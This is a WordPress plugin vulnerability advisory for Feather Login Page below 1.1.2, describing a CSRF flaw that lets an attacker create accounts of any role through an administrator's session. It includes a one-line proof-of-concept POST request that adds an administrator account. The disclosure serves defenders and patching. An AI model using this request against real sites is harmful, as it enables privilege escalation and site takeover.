WordPress Plugin Vulnerabilities
Feather Login Page < 1.1.2 - Cross-Site Request Forgery to Privilege Escalation
Description
The plugin does not protect its ftlpp-ext-expirable-login-link action against CSRF attacks, allowing an unauthenticated attacker to add users of any role on their behalf by tricking a logged in administrator to submit a crafted request.
Proof of Concept
POST /wp-admin/admin-ajax.php?action=ftlpp-ext-expirable-login-link HTTP/1.1 Content-Type: application/json Cookie: [Admin+] {"firstName":"Evil","email":"evil@example.com","role":"administrator","accountLinkExpiry":"999"}
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Lana Codes
Verified
No
WPVDB ID
Timeline
Publicly Published
2023-05-30 (about 11 months ago)
Added
2023-05-31 (about 11 months ago)
Last Updated
2023-07-07 (about 10 months ago)